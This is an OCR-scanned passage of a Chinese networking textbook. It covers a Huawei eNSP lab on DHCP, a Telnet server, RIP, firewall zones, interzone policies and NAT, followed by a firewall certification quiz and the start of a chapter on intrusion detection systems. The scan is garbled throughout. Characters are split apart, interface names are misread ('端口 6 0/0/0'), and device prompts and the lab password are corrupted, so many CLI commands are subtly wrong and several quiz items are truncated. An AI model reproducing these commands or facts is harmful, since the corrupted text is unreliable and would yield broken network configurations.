(3) 配置 DHCP 客户 端 .使 DHCP 客户 端 自 动 获取 IP 验证 。 配 置 完成 后 ,网 络 拓扑 
中 FW1 的 内 网 连接 指示 灯 全 部 变 成 绿色 。 单 击 DHCP 客户 端 Client3 的 “基础 配置 ” 选 
项 卡 ,选择 “IPv4 配置 ”下 的 DHCP 选项 ,然后 单 击 “应 用 ?按钮 ,如 图 18-3 所 示 。 接 着 单 
击 “ 命 令 行 ”选项 卡 ,在 命令 行 窗口 中 输入 ipconfig /renew 可 以 自动 获取 IP 地 址 和 网 关 


地 址 ,如 图 18-4 所 示 。 


(4) 配置 Web 服务 器 和 FTP 服务 器 的 IP 地 址 、 子 网 掩 码 和 网 关 , 地址 信息 如 


表 18-4 所 示 。 
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(5) 在 路 由 器 AR1 上 配置 Telnet 服务 器 ,具体 配置 如 下 。 





< Huawei > system — view // 进 入 系统 视图 界面 
[Huawei]sysname RR1 // 修 改 设备 名 称 为 RR1 

[AR1 ]interface gigabitethernet 0/0/0 // 进 入 端口 6 0/0/0 

[AR1 - GigabitEthernet0/0/0]ip address 192.168.1.23 24 // 配 置 IP 地 址 与 子 网 掩 码 
[AR1 - GigabitEthernet0/0/0]quit // 退 出 端口 

[AR1]ip route— static 0.0.0.0 0.0.0.0 192.168.1.1 // 定 义 静 态 路 由 ,实现 网 络 连 通 


[AR1]user- interface vty 0 4 // 为 AR1 配置 登录 方式 为 密码 验证 登录 

[AR1 - ui- vty0 ~ 4]authentication ~— mode password 

Please configure the login password (maximum length 16):tel123 // 设 置 密码 为 tel123 

[AR1 - ui- vty0 — 4]quit 

(6) Telnet 服务 配置 的 验证 。 由 于 eNSP 的 PC 不 支持 telnet 命令 ,因此 可 以 在 防火 
墙 FW1 的 用 户 视图 上 进行 远程 登录 验证 ,输入 tel 192. 168. 1. 23, 然 后 输入 密码 
“tel123”, 即 可 顺利 登录 到 Telnet 服务 器 上 ,如 图 18-5 所 示 。 





18-5 Telnet 服务 器 的 远程 登录 验证 


(7) 配置 完成 后 ,Telnet 服务 器 、Web 服务 器 和 FTP 服务 器 均 可 以 Ping 通 防火 墙 的 
外 网 端口 IP 地 址 (202. 101. 12. 1) ,至 此 完成 了 总 公司 的 网 络 组 建 。 

(8) 子 公 司 网 络 组 建 。 对 子 公 司 路 由 器 、 客 户 端 设备 配置 .可 以 组 建 一 个 子 公 司 小 型 
局 域 网 ,主要 分 为 3 步 : 路 由 器 AR3 的 配置 ; @Telnet 客户 端的 配置 ; @FTP 和 Web 
客户 端的 配置 。 

(9) 配置 子 公 司 路 由 器 AR3 连接 内 网 的 端口 ,并 配置 Easy-IP 地 址 转换 。 双 击 路 由 
器 AR3 ,在 弹出 的 窗口 中 配置 AR3, 具 体 配置 如 下 。 


< Huawei > system — view // 进 入 系统 视图 界面 
[Huawei]sysname AR3 // 修 改 设备 名 称 为 AR3 
[AR3 ] interface gigabitethernet 0/0/0 // 进 入 端口 6 0/0/0 

[AR3 - GigabitEthernet0/0/0]ip address 192.168.2.1 24  // 配 置 IP 地 址 与 子 网 掩 码 
[AR3 - GigabitEthernet0/0/0]quit // 退 出 端口 
[AR3]interface gigabitethernet 0/0/1 // 进 入 端口 6 0/0/1 

[AR3 - GigabitEthernet0/0/1]ip address 202.101.10.2 24 // 配 置 IP 地 址 与 子 网 掩 码 
[RAR3 — GigabitEthernet0/0/1]quit // 退 出 端口 

[AR3]ip route — static 0.0.0.0 0.0.0.0 202.101.10.1 // 添 加 默认 路 由 


(10) 配置 子 公司 的 Telnet 客户 端 。 双 击 路 由 器 AR4, 在 弹出 的 窗口 中 配置 Telnet 
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客户 端 , 具 体 配置 如 下 。 
< Huawei > system — view // 进 入 系统 视图 界面 
[Huawei]sysname AR4 // 修 改 设备 名 称 为 AR4 
[RAR4]interface gigabitethernet 0/0/0 // 进 入 端口 6 0/0/0 
[AR4 - GigabitEthernet0/0/0]ip address 192.168.2.3 24 ”// 配 置 IP 地 址 与 子 网 掩 码 
[AR4 — GigabitEthernet0/0/0]quit // 退 出 端口 


[AR4]ip route— static 0.0.0.0 0.0.0.0 192.168.2.1 // 定 义 默认 路 由 ,实现 网 络 连 通 


(11) 配置 子 公司 的 FTP 和 Web 客户 端 。 双 击 Client4 ,在 基础 配置 窗口 中 将 IP 地 
址 设置 为 192. 168. 2.2, 子 网 掩 码 设置 为 255. 255. 255.0, 网 关 设 置 为 192. 168. 2. 1。 

(12) 配置 完成 后 ,Telnet 服务 器 、Web 服务 器 和 FTP 服务 器 均 可 以 Ping 通路 由 器 
AR3 的 外 网 口 IP 地址 (202. 101. 10. 2) ,至 此 完成 了 子 公司 的 网 络 组 建 。 

(13) 总 公司 与 子 公司 的 连接 配置 。 〇 配置 路 由 器 AR2 连接 防火 墙 FW1 的 端口 IP 
地 址 和 连接 子 公司 路 由 器 AR3 的 端口 IP 地 址 ; 加 防火 墙 的 可 信 区 域 设 置 。 

(14) 配置 路 由 器 AR2 的 端口 IP 地 址 ,具体 的 配置 如 下 。 





< Huawei > system - view // 进 入 系统 视图 界面 
[Huawei]sysname AR2 // 修 改 设备 名 称 为 AR2 
[AR2]interface gigabitethernet 0/0/1 // 进 入 端口 6 0/0/1 

[AR2 - GigabitEthernet0/0/1]ip address 202.101.12.2 24 // 配 置 IP 地 址 与 子 网 掩 码 
[AR2 - GigabitEthernet0/0/1]quit // 退 出 端口 
[AR2]interface gigabitethernet 0/0/2 // 进 入 端口 6 0/0/2 

[AR2 - GigabitEthernet0/0/2]ip address 202.101.10.1 24 // 配 置 IP 地 址 与 子 网 掩 码 
[AR2 - GigabitEthernet0/0/2]quit // 退 出 端口 
[AR2]interface gigabitethernet 0/0/0 // 进 入 端口 6 0/0/0 

[AR2 - GigabitEthernet0/0/0]ip address 202.101.15.1 24 // 配 置 IP 地 址 与 子 网 掩 码 
[AR2 - GigabitEthernet0/0/0]quit // 退 出 端口 

[AR2]rip // 开 启 rip 进程 

[AR2— rip— 1]version 2 // 运 行 v2 版 本 
[AR2— rip— 1]network 202.101.12.0 // 宣 告 直 连 网 络 
[AR2— rip— 1]network 202.101.10.0 // 宣 告 直 连 网 络 
[AR2— rip- 1]network 202.101.15.0 // 宣 告 直 连 网 络 


[aR2 - rip— 1]quit 


(15) 防火 墙 FW1 的 基本 配置 。 采 用 路 由 模式 配置 防火 墙 内 网 与 外 网 的 连接 端口 ， 
并 添加 到 相应 的 zone。 双 击 防火 墙 FW1 ,在 弹出 的 窗口 中 配置 FW1, 具 体 配置 如 下 。 


[FW1]ip route— static 0.0.0.0 0.0.0.0 202.101.12.2 // 添 加 默认 路 由 


[FW1 ]firewall zone trust // 进 入 trust 安全 区 域 视图 
[FW1 - zone 一 trust]add interface gigabitethernet 0/0/0 ”// 将 端口 加 入 到 trust 区 域 
[FW1 - zone— trust]quit // 退 出 

[FW1]firewall zone untrust // 进 入 untrust 安全 区 域 视图 
[FW1 - zone- untrust]add interface gigabitethernet 0/0/1 // 将 端口 加 入 到 untrust 区 域 
[FW1 - zone— untrust]quit // 退 出 

[EW1 ]interface gigabitethernet 0/0/0 // 进 入 端口 6 0/0/0 


(16) 配置 完成 后 ,防火 墙 可 以 Ping 通 外 网 设备 的 地 址 (202. 101. 12. 2) ,但 是 总 公司 
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内 网 的 服务 器 和 DHCP 客户 端 仍 不 能 Ping 通 外 网 设备 的 地 址 (202. 101. 12. 2) ,外 网 设 
备 (AR2) 也 不 能 Ping 通 防火 墙 (202. 101. 12. 1) 。 

(17) 配置 防火 墙 FW1 的 策略 。 放 行 untrust 到 local 的 inbound 策略 中 的 icmp 部 
分 和 telnet 部 分 ,具体 配置 如 下 。 





[FW1 ]policy interzone local untrust inbound 

FW1 - policy- interzone - local - untrust - inbound]policy 1 // 建 立 一 个 命名 为 1 的 策略 

FW1 - policy ~ interzone ~— local - untrust ~ inbound - 1]action permit 

FW1 - policy- interzone — local - untrust - inbound - 1]policy service service— set icmp 
// 人 允许 ICMP 服务 

FW1 - policy ~ interzone - local - untrust - inbound - 1]policy service service— set telnet 
// 人 允许 Telnet 服务 

FW1 - policy- interzone ~ local - untrust - inbound - 1]policy service service— set ftp 
// 人 允许 FTP 服务 

[FW1 - policy- interzone ~ local - untrust - inbound - 1]policy service service— set http 
// 人 允许 HTTP 服务 

FW1 - policy- interzone- local - untrust ~ inbound — 1]quit 





FW1 - policy- interzone - local - untrust ~ inbound]quit 
[FW1 ]firewall packet ~— filter default permit interzone trust untrust direction outbound 
// 开 启 trust 到 untrust 的 默认 行为 允许 


(18) 配置 完成 后 .外 网 设备 (AR2) 可 以 Ping 通 防火 墙 的 外 网 端口 (202. 101. 12. 1) ,但 
是 总 公司 内 网 的 服务 器 和 DHCP 客户 端 不 能 Ping 通 外 网 设备 的 地 址 (202. 101. 12. 2) 。 
(19) 开启 防火 墙 FW1 的 NAT, 人 允许 内 网 访问 外 网 的 NAT 策略 ,具体 配置 如 下 。 


[FW1]nat address - group 1 202.101.12.1 202.101.12.1 // 建 立 一 个 唯一 出 口 的 NAT 地 址 池 
[FW1]nat - policy interzone trust untrust outbound // 配 置 trust 到 untrust 的 NAT outbound 规则 
[FW1 - nat — policy- interzone— trust ~ untrust ~ outbound]policy 1 

[FW1 - nat- policy ~ interzone ~ trust ~ untrust ~ outbound ~— 1]action source— nat 

[FW1 - nat - policy — interzone — trust - untrust ~ outbound - 1]policy source 192.168.1.0 mask 
24 

[FW1 - nat ~ policy- interzone ~ trust- untrust - outbound- 1]address - group 1 

[FW1 - policy- interzone ~ local - untrust ~- inbound- 1]quit 

[FW1 - policy- interzone - local - untrust - inbound]quit 


(20) 配置 完成 后 ,总 公司 内 网 的 DHCP 客户 端 和 Telnet 服务 器 .FTP 服务 器 和 
Web 服务 器 均 可 以 Ping 通 外 网 设备 的 地 址 (202. 101. 12. 2) ,也 可 以 Ping 通 子 公司 的 外 
网 端口 (202. 101. 10. 2) 。 但 是 因为 路 由 器 AR2 并 没有 学 习 到 子 公司 的 私有 地 址 ,因此 总 
公司 的 服务 器 和 DHCP 客户 端 是 Ping 不 通 子 公司 的 内 网 地 址 (192. 168. 2. 1) 的 。 

(21) 配置 防火 墙 的 NAT 策略 ,允许 外 网 访问 Telnet 服务 器 .FTP 服务 器 和 Web 服 
务 器 ,Telnet 服务 器 使 用 端口 2323 ,其 他 服务 器 选择 默认 端口 。 先 做 NAT, 再 匹配 策略 ， 
具体 配置 如 下 。 

[FW1 ]nat server 0 protocol tcp global interface gigabitethernet 0/0/1 2323 inside 192. 168. 

1.23 telnet // 配 置 NAT Server Telnet 规则 


[FW1 J]nat server 1 protocol tcp global interface gigabitethernet 0/0/1 ftp inside 192.168.1. 
21 ftp // 配 置 NAT Server FTP 规则 
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FW1 ]nat server 2 protocol tcp global 202.101.12.1 www inside 192.168.1.80 www 

// 配 置 NAT Server HTTP 规则 
FW1]policy interzone trust untrust inbound // 配 置 trust 到 untrust 的 NAT Inbound 规则 
FW1 - policy- interzone— trust ~— untrust ~ inbound]policy 1 
FW1 - policy- interzone— trust ~— untrust — inbound — 1]action permit 
FW1 - policy— interzone— trust ~— untrust — inbound— 1]policy service service— set telnet 
FW1 - policy— interzone— trust ~ untrust ~ inbound— 1]policy service service— set ftp 
FW1 - policy— interzone— trust ~ untrust ~ inbound— 1]policy service service— set http 
FW1 - policy— interzone— trust ~ untrust ~ inbound— 1]policy destination 192.168.1.23 0 
[FW1 - policy— interzone— trust ~ untrust ~ inbound— 1]policy destination 192.168.1.21 0 
FW1 - policy— interzone ~— trust ~ untrust ~ inbound— 1]policy destination 192.168.1.80 0 
FW1 - policy— interzone— trust ~ untrust ~ inbound— 1]quit 





[FW1 - policy ~ interzone ~ trust ~ untrust ~ inbound]quit 


(22) 配置 子 公司 路 由 器 AR3 的 Easy-IP 地 址 转换 。 双 击 路 由 器 AR3 ,在 弹出 的 窗 
口中 配置 AR3 ,具体 配置 如 下 。 

[AR3]acl 2001 

[AR3 - acl - basic- 2001]rule 5 permit source 192.168.2.0 0.0.0.255 // 定 义 规则 源 地 址 

[RAR3 - acl— basic - 2001]quit // 退 出 

[AR3]interface gigabitethernet 0/0/1 // 进 入 端口 6 0/0/1 

[AR3 - GigabitEthernet0/0/1]nat outbound 2001 

// 对 ACL 2001 定义 的 地 址 段 进行 网 络 地 址 转换 ,并 直接 使 用 6 0/0/1 端口 的 IP 地 址 作为 NAT 转换 

// 后 的 地 址 

(23) 配置 完成 后 , 子 公司 内 网 的 Telnet 客户 端 \FTP 和 Web 客户 端 均 可 以 Ping 通 外 
网 设备 的 地 址 (202. 101. 10. 2), 也 可 以 Ping 通 总 公司 防火 墙 的 外 网 端口 (202. 101. 12. 1)。 
但 是 因为 路 由 器 AR2 并 没有 学 习 到 总 公司 的 私有 地 址 ,因此 子 公司 的 客户 端 是 Ping 不 
通 总 公司 的 内 网 地 址 (192. 168. 1. 1) 的 。 但 是 ,双击 子 公司 的 Telent 客户 端 AR4, 输 入 
telnet 202. 101. 12. 1 2323 , 按 Enter 键 ,提示 输入 密码 ,输入 密码 “tel123” 后 可 以 成 功 登录 
Telnet 服务 器 AR1。 

(24) 外 网 Internet 的 FTP 和 Web 客户 端 配置 。 双 击 Client5 ,在 基础 配置 窗口 中 将 
IP 地 址 设置 为 202. 101. 15. 2, 子 网 掩 码 设置 为 255. 255. 255. 0, 网 关 设 置 为 202. 101. 
15,16 

(25) 外 网 Internet 的 Telnet 客户 端 配置 。 双 击 路 由 器 AR5, 在 弹出 的 窗口 中 配置 
外 网 Telnet 客户 端 ,具体 的 配置 如 下 。 


< Huawei > system — view // 进 入 系统 视图 界面 
[Huawei]sysname RR5 // 修 改 设 备 名 称 为 AR5 
[ARS ] interface gigabitethernet 0/0/0 // 进 入 端口 6 0/0/0 

[AR5 - GigabitEthernet0/0/0]ip address 202.101.15.3 24 // 配 置 IP 地 址 与 子 网 掩 码 
[AR5 - GigabitEthernet0/0/0]quit // 退 出 端口 


[aR5]ip route— static 0.0.0.0 0.0.0.0 202.101.15.1 // 定 义 默认 路 由 ,实现 网 络 连 通 

(26) 配置 完成 后 .外 网 的 Telnet 客户 端 \FTP 和 Web 客户 端 均 可 以 Ping 通 总 公司 
防火 墙 的 外 网 端口 (202. 101. 12. 1) :也 可 以 Ping 通 子 公司 的 外 网 端口 (202. 101. 12. 2)。 
在 外 网 客户 端 AR5 中 输入 telnet 202. 101. 12. 1 2323 , 按 Enter 键 ,提示 输入 密码 ,输入 密 
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码 *tell23” 可 以 成 功 登录 Telnet 服务 器 AR1。 

(27) 通过 以 上 操作 ,可 以 实现 子 公司 与 总 公司 、 外 网 Internet 与 总 公司 之 间 的 通信 。 
通过 验证 外 网 客户 端子 公司 客户 端 可 以 访问 总 公司 的 Web 服务 器 、FTP 服务 器 和 
Telnet 服务 器 。 

(28) 防火 墙 策略 配置 。 要 实现 子 公司 客户 端 可 以 访问 总 公司 服务 器 ,限制 外 网 
Internet 客户 端 访问 总 公司 服务 器 ,还 需要 在 总 公司 防火 墙 做 以 下 配置 。 

[FW1]policy interzone trust untrust inbound // 配 置 trust 到 untrust 的 NAT Inbound 规则 

[FW1 - policy- interzone ~ trust ~ untrust - inbound]policy 1 

[FW1 - policy- interzone ~ trust ~ untrust ~ inbound — 1]policy source 202.101.10.20 

// 添 加 策略 , 指定 子 公司 网 段 地 址 可 以 访问 总 公司 服务 器 

[FW1 - policy- interzone — trust ~ untrust ~ inbound— 1]quit 

[FW1 - policy- interzone — trust ~ untrust ~- inbound]quit 

(29) 实验 结果 验证 。 在 全 网 互通 的 基础 上 ,为 总 公司 防火 墙 添加 策略 配置 ,实现 外 
网 Internet 不 能 访问 总 公司 服务 器 ,而 子 公司 客户 端 可 以 访问 总 公司 的 Web 服务 器 、 
FTP 服务 器 和 Telnet 服务 器 。 双 击 子 公司 的 Telent 客户 端 AR4, 输 入 telnet 202. 101. 
12. 1 2323, 按 Enter 键 ,提示 输入 密码 ,输入 密码 “tell23” 可 以 成 功 登 录 Telnet 服务 器 
AR1。 在 外 网 客户 端 AR5 中 输入 telnet 202. 101. 12. 1 2323, 则 提示 不 能 访问 Telnet 服 
务 器 。 开 启 总 公司 FTP 和 Web 服务 器 ,在 子 公司 客户 端 访问 ,显示 可 以 登录 访问 ,而 在 
外 网 Internet 客户 端 访 问 总 公司 服务 器 , 则 显示 不 能 访问 。 


18.5 常见 问题 解答 


防火 墙 的 Inbound 和 Outbound 的 区 别 是 什么 ? 

答 : 数据 从 可 信 区 域 (内 网 ,高 优先 级 ) 到 不 可 信 区 域 ( 外 网 , 低 优先 级 ) 为 Outbound 
流量 ,数据 从 不 可 信 区 域 ( 外 网 , 低 优 先 级 ) 到 可 信 区 域 ( 内 网 ,高 优先 级 ) 为 Inbound 流量 。 
无 论 是 Outbound 还 是 Inbound 都 是 指 TCP 第 一 次 握手 , 即 考虑 是 谁 主动 发 起 的 。 


18.6 认证 试题 


一 、 选 择 题 


1. 为 了 防止 局 域 网 外 部 用 户 对 内 部 网 络 的 非法 访问 ,可 采用 的 技术 是 ( 
A. 网 卡 B. 网 关 C. 网 桥 D. 防火 墙 
2. 关于 防火 墙 的 功能 .以 下 描述 错误 的 是 ( 
A. 防火 墙 能 检查 进出 内 部 网 的 通信 量 
B. 防火 墙 能 使 用 应 用 网 关 技 术 在 应 用 层 上 建立 协议 过 滤 和 转发 功能 
C. 防火 墙 可 以 使 用 过 滤 技 术 在 网 络 层 对 数据 包 进行 选择 
D. 防火 墙 能 阻止 来 自 网 络 内 部 的 威胁 和 攻击 
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3. 关于 防火 墙 的 描述 ,以 下 错误 的 是 ( ”)。 
A. 防火 墙 不 能 防止 内 部 攻击 
B. 使 用 防火 墙 可 以 防止 一 个 网 段 的 问题 向 另 一 个 网 段 传播 
C. 防火 墙 可 以 防止 伪装 成 内 部 信任 主机 的 IP 地 址 欺骗 
D. 防火 墙 可 以 防止 伪装 成 外 部 信任 主机 的 IP 地 址 欺骗 
4. 包 过 滤 防 火 墙 通过 ( ) 来 确定 数据 包 是 否 能 通过 。 
A. 路 由 表 B. ARP 表 C. NAT 表 D. 过 滤 规 则 
5. 包 过 滤 防 火 墙 对 通过 防火 墙 的 数据 包 进 行 检查 ,只 有 满足 条 件 的 数据 包 才能 通 
过 ,对 数据 包 的 检查 内 容 一 般 不 包括 ( 5 
A. 源 地 址 B. 目的 地 址 
6. 包 过 滤 技 术 与 代理 服务 技术 相 比较 (  )。 
A. 包 过 滤 技 术 安 全 性 较 弱 ,但 会 对 网 络 性 能 产生 明显 影响 
B. 包 过 滤 技 术 对 应 用 和 用 户 是 绝对 透明 的 
C. 代理 服务 技术 安全 性 较 高 ,但 不 会 对 网 络 性 能 产生 明显 影响 
D. 代理 服务 技术 安全 性 高 ,对 应 用 和 用 户 透明 度 也 很 高 
7. 对 状态 检查 技术 (ASPF) 的 优 缺 点 描述 有 误 的 是 ( )。 
A. 采用 检测 模块 检测 状态 信息 B. 支持 多 种 协议 和 应 用 
C. 不 支持 检测 RPC 和 UDP 的 端口 信息 D. 配置 复杂 会 降低 网 络 速度 
8. 防火 墙 中 NAT 技术 的 作用 是 ( 3 


C. 协议 D. 有 效 载荷 


A. 提供 代理 服务 B. 隐藏 内 部 网 络 地 址 
C. 进行 人 侵 检测 D. 防止 病毒 人 侵 
9. 下 列 不 是 防火 墙 的 工作 模式 的 是 ( Ye 
A. 透明 模式 B. 路 由 模式 C. 混合 模式 D. 代理 模式 
10. 下 列 ( ) 不 属于 防火 墙 的 常用 技术 。 
A. 简单 包 过 滤 技 术 B. 应 用 代理 技术 
C. 状态 检测 包 过 滤 技 术 D. 复合 技术 
E. 地 址 翻译 技术 
11. 防火 墙 的 规则 包括 ( ) 和 ( yz 
A. IP 地 址 B. 端口 号 C. 匹配 规则 D. 动作 
12. 防火 墙 的 测试 性 能 参数 一 般 包括 ( Xs 
A. 吞吐 量 B. 新 建 连接 速率 ” C. 并 发 连接 数 D. 处 理 时 延 


13. 下 列 有 关 防 火 墙 局 限 性 描述 正确 的 是 ( 
A. 防火 墙 不 能 防范 不 经 过 防火 墙 的 攻击 
B. 防火 墙 不 能 解决 来 自 内 部 网 络 的 攻击 和 安全 问题 
C. 防火 墙 不 能 对 非法 的 外 部 访问 进行 过 滤 
D. 防火 墙 不 能 防止 策略 配置 不 当 或 错误 配置 引起 的 安全 威胁 

14. Web 应 用 防火 墙 和 普通 防火 墙 的 区 别 是 ( 
A. 普通 防火 墙 不 检测 数据 包 中 的 内 容 


)s 


六 
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B. Web 应 用 防火 墙 对 Web 攻击 具有 深度 防御 能 力 
C. 普通 防火 墙 可 以 替代 Web 应 用 防火 墙 
D. Web 应 用 防火 墙 可 以 蔡 代 普通 防火 墙 

15. 最 常用 的 Web 应 用 防火 墙 部 署 模式 是 ( )。 





A. 透明 模式 B. 路 由 模式 C. 混合 模式 D. 代理 模式 
16. 在 透明 模式 下 ,( ”) 要 求 Web 应 用 防火 墙 支持 多 进 多 出 的 部 署 方式 。 
A. 单一 服务 器 B. 单 网 段 多 服务 器 
C. 多 服务 器 多 网 段 D. 旁 路 部 署 
二 、 判断 题 
1. 包 过 滤 防 火 墙 一 般 工 作 在 OSI 参考 模型 的 网 络 层 与 传输 层 ,主要 对 IP 分 组 和 
TCP/UDP 端口 进行 检测 和 过 滤 操 作 。 ( ) 
2. 采用 防火 墙 的 网 络 一 定 是 安全 的 。 ( ) 
3. 一 般 来 说 防火 墙 在 OSI 参考 模型 中 的 位 置 越 高 ,所 需要 检查 的 内 容 就 越 多 ,同时 
CPU 和 RAM 的 要 求 也 就 越 高 。 ( ) 


4. 当 硬件 配置 相同 时 ,代理 防火 墙 对 网 络 运 行 性 能 的 影响 比 包 过 滤 防 火 墙 小 。 
( 
5. 在 传统 包 过 滤 .代理 和 状态 检测 三 类 防火 墙 中 ,只 有 状态 检测 防火 墙 可 以 在 一 定 


程度 上 检测 并 防止 内 部 用 户 的 恶意 破坏 。 [9 
6. 有 些 个 人 防火 墙 是 一 款 独 立 的 软件 ,而 有 些 个 人 防火 墙 则 整合 在 防 病毒 软件 当中 

使 用 。 ( ) 
三 、 简 答题 


防火 墙 是 否 可 以 防范 病毒 ? 为 什么 ? 


Project 190 时 


19.1 用 户 需 求 与 分 析 


随 着 网 络 安全 风险 不 断 增 大 , 仅 使 用 防火 墙 作为 主要 的 安全 防范 手段 已 远 远 不 够 ,已 
经 不 能 满足 人 们 对 网 络 安全 的 需求 。 因 为 网 络 攻击 者 可 能 在 不 断 地 寻找 防火 墙 的 漏洞 ， 
而 且 防 火 墙 无 法 提供 实时 的 入 侵 检测 能 力 。 因 此 使 用 入 侵 检 测 系统 IDS 有 助 于 快速 发 
现 网 络 攻击 ,提高 网 络 安全 管理 员 的 安全 审计 、 监 视 、 入 侵 识 别 和 响应 能 力 。 有 人 将 IDS 
产品 比 作 继 杀 毒 和 防火 墙 产品 之 后 安全 领域 的 第 三 战场 。 


19.2 预备 知识 


但 21 入 侵 检测 系统 的 功能 


人 侵 检 测 系 统 (Intrusion Detection Systems,IDS) 在 1980 年 4 月 由 美国 空军 的 ( 计 
算 机 安全 威胁 监控 与 监视 ) 的 技术 报告 中 提出 , 它 是 一 种 实时 的 网 络 入 侵 检测 和 响应 系 
统 ,能 够 实时 监控 网 络 传输 。 它 依照 一 定 的 安全 策略 ,对 被 保护 的 网 络 流量 进行 检测 ,或 
对 系统 的 运行 状况 进行 监视 ,自动 检测 可 疑 行为 ,分 析 来 自 网 络 外 部 和 内 部 的 入 侵 信和 号。 
尽 可 能 发 现 各 种 攻击 企图 、 攻 击 行为 或 攻击 结果 ,在 发 现 有 入 侵 行为 或 者 将 要 有 人 入侵 行为 
时 发 出 警报 ,实时 对 攻击 做 出 响应 ,并 提供 补救 措施 ,以 保证 网 络 系统 资源 的 机 密 性 、 完 整 
性 和 可 用 性 ,最 大 限度 地 为 网 络 系统 提供 安全 保障 。 

常见 的 和 人 侵 检测 系统 的 功能 如 下 。 

(1) 网 络 流量 管理 : 大 多 数 入 侵 检测 系统 允许 记录 、 报 告 和 禁止 几乎 所 有 形式 的 网 
络 访问 ,还 可 以 监视 某 台 主机 上 通过 的 所 有 网 络 流量 。 当 定义 了 策略 和 规则 后 ,在 设备 上 
可 以 捕获 到 HTTP、FTP、SMTP、Telnet 和 任何 其 他 的 流量 ,这 种 策略 和 规则 有 助 于 追查 
网 络 连接 等 相关 信息 。 

(2) 系统 扫描 : 和 人 侵 检测 系统 扫描 当前 网 络 的 活动 ,监视 和 记录 网 络 的 流量 ,根据 定 
义 好 的 规则 来 过 滤 各 种 流量 ,提供 实时 警报 。 

(3) 追踪 : 入 侵 检测 系统 不 仅 能 记录 安全 事件 ,还 可 以 确定 安全 事件 发 生 的 位 置 。 
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通过 追踪 来 源 , 可 以 更 多 地 了 解 攻击 者 。 入 侵 检 测 系统 记录 下 的 日 志 不 仅 可 以 记录 攻击 
过 程 ,同时 也 有 助 于 确定 解决 方案 。 


但 22 入 侵 检测 系统 的 工作 原理 


本 质 上 ,入 侵 检测 系统 是 一 个 典型 的 嗅 探 设备 , 它 在 网 络 上 主动 地 、 无 声息 地 收集 需 
要 的 报 文 , 像 公路 上 的 摄像 头 一 样 ,对 攻击 者 的 入 侵 行 为 进行 监测 ,对 网 络 安全 起 保护 作 
。 人 侵 检测 系统 的 运行 方式 有 两 种 : 一 种 是 在 目标 主机 上 运行 以 监测 本 身 的 通信 信 
息 ; 另 一 种 是 在 一 台 单 独 的 机 器 上 运行 以 监测 所 有 网 络 设备 的 通信 信息 ,如 Hub、 路 由 器 
等 。 当 有 某 个 事件 与 一 个 已 知 攻击 的 特征 相 匹 配 时 ,多 数 IDS 都 会 报警 。 

入 侵 检测 系统 处 理 网 络 上 数据 信息 的 过 程 分 为 数据 采集 阶段 .数据 处 理 及 过 滤 阶 段 、 
入 侵 分 析 及 检测 阶段 .报告 及 响应 阶段 共 4 个 阶段 。 

(1) 数据 采集 阶段 。 此 阶段 收集 目标 系统 中 主机 通信 数据 包 和 系统 使 用 等 数据 信 
息 。 它 是 入 侵 检 测 的 第 一 步 , 探 测 器 通过 监测 端口 捕获 网 络 分 组 ,采集 的 数据 包括 系统 、 
网 络 .数据 及 用 户 获 得 的 状态 和 行为 。 由 放置 在 不 同 网 段 的 传感器 或 不 同 主机 的 代理 来 
收集 包括 系统 和 网 络 日 志文 件 、 网 络 流量 , 非 正常 的 目录 和 文件 改变 、 非 正常 的 程序 执行 
等 信息 。 

(2) 数据 处 理 及 过 滤 阶 段 。 此 阶段 对 采集 到 的 数据 进行 分 析 和 处 理 , 如 果 有 需要 ,会 
对 报 文 进 行 重 组 ,并 与 标识 典型 人 侵 行为 的 规则 进行 比较 。 最 常用 的 技术 手段 有 三 种 , 即 
模式 匹配 、 统 计 分 析 和 完整 性 分 析 。 

(3) 入侵 分 析 及 检测 阶段 。 此 阶段 是 整个 人 侵 检测 系统 的 核心 阶段 ,根据 数据 采集 
阶段 提供 的 数据 ,数据 处 理 及 过 滤 阶 段 产生 的 分 析 结 果 来 判断 是 否 发 生 入 侵 。 如 果 通 过 
数据 分 析 , 判 断 网 络 中 可 能 发 生 了 入 侵 行 为 , 则 通过 命令 和 控制 接口 通知 管理 控制 台 。 

(4) 报告 及 响应 阶段 。 此 阶段 如 果 检 测 到 了 入 侵 ,管理 控制 台 将 发 出 警报 ,书写 日 志 
并 采取 某 些 行动 ,可 能 是 重新 配置 路 由 器 或 防火 墙 . 终 止 进程 .切断 连接 \ 改 变 文件 属性 ， 
也 可 能 只 是 简单 的 发 出 警报 。 


但 23 入 侵 检测 系统 的 分 类 


和 人 侵 检 测 系统 被 认为 是 防火 墙 之 后 的 第 二 道 安 全 闸门 。 入 侵 检测 系统 通过 对 入 侵 行 
为 的 过 程 和 特征 进行 研究 ,使 安全 系统 对 入 侵 事 件 和 入 侵 过 程 做 出 实时 响应 。 根 据 输入 
数据 的 来 源 ,可 以 把 入侵 检测 系统 分 为 3 类 。 


1. 基于 主机 的 入 侵 检 测 系 统 


基于 主机 的 入 侵 检 测 系 统 (HIDS) 的 输入 数据 来 源 于 系统 的 审计 日 志 , 主 要 是 针对 该 
主机 的 网 络 实时 连接 以 及 对 系统 审计 日 志 进 行 智 能 分 析 和 判断 。 基 于 主机 的 和 人 侵 检测 系 
统 通常 安装 在 被 重点 检测 的 主机 上 ,最 适合 检测 内 部 人 员 的 误 操作 以 及 已 经 避 开 传统 的 
检测 方法 而 渗透 到 网 络 中 的 活动 。 其 优点 是 对 分 析 * 可 能 的 攻击 行为 "非常 有 用 ,而 且 系 
统 通常 比 网 络 人 侵 检测 系统 误 报 率 要 低 ; 其 缺点 是 系统 需要 安装 在 需要 保护 的 设备 上 ， 
依赖 于 服务 器 固有 的 日 志和 监测 能 力 。 全 面部 署 HIDS 的 花费 较 大 ,因此 通常 选择 部 分 
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主机 进行 保护 ,而 那些 未 安装 HIDS 的 计算 机 将 成 为 保护 的 盲点 ,入侵 者 可 以 把 这 些 计 算 
机 作为 攻击 目标 ,因为 HIDS 除了 监测 安装 自身 的 主机 外 ,根本 不 监测 网 络 上 的 情况 。 


2. 基于 网 络 的 入 侵 检测 系统 


基于 网 络 的 入 侵 检 测 系 统 (NIDS) 的 输入 数据 来 源 于 网 络 信息 流 ,通常 部 署 在 企业 网 
络 出 口 处 或 内 部 关键 子 网 边界 等 比较 重要 的 网 段 内 ,检测 流 经 整个 网 络 的 流量 和 网 段 中 
各 种 数据 包 。NIDS 能 够 检测 该 网 段 上 发 生 的 网 络 和 人 侵 , 也 可 以 在 检测 到 入 侵 后 通过 向 
连接 的 交换 机 或 防火 墙 发 送 指 令 阻 断后 续 攻击 。NIDS 的 优点 是 能 够 检测 来 自 网 络 的 攻 
